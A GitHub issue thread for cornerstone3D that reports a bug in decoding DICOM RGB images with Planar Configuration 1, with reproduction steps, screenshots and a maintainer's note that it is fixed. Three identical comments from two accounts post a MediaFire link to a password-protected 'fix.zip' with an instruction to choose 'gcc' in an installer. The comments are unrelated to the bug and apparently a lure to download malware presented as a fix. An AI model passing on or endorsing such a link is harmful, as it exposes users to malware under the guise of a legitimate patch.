### ISSUE TITLE
[Bug] `(0028,0010) Planar Configuration : 1` is not read properly

### ISSUE THREAD

**Issue by Ragnar-Oock** [cornerstonejs/cornerstone3D#1440]
### Describe the Bug

Display of DICOM files with `(0028,0004) Photometric Interpretation : RGB` and `(0028,0006) Planar Configuration : 1` is not done properly. The different color planes are always interpreted as if they are interlaced (default value of `(0028,0006) Planar Configuration`), see [Planar Configuration on dicom.innolitics.com](https://dicom.innolitics.com/ciods/computed-radiography-image/image-pixel/00280006) or [on the official nema website](https://dicom.nema.org/medical/dicom/current/output/chtml/part03/sect_C.7.6.3.html#sect_C.7.6.3.1.3).

I failed to find where the pixel data decoding is implemented but I suspect there is no check implemented for the element linked above.

### Steps to Reproduce

open the attached (anonymized) file in the [live example from file system](https://www.cornerstonejs.org/live-examples/local.html)

zip archive with the file (because of github limitations on file types)
[RGB planar 1.zip](https://github.com/user-attachments/files/16749316/RGB.planar.1.zip)

### The current behavior

![image](https://github.com/user-attachments/assets/dfcdef38-f8f7-4063-8769-bbb36971f5db)
screenshot of the result in the live example

color planes are decoded in the `R1,G1,B1,R2,G2,B2,[...]` pattern instead of the `R1,R2,[...],G2,G2,[...]B1,B2,[...]` described in the spec for `(0028,0006) Planar Configuration : 1`

### The expected behavior

![image](https://github.com/user-attachments/assets/8376115a-ba1f-4894-a77c-e84504c53201)
screenshot of the correct render of the file in MicroDicom

color planes should be decoded properly to enable correct rendering of the image

### OS

Windows 11

### Node version

N/A

### Browser

Firefox 129

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sedghi** [comment]
It is fixed now
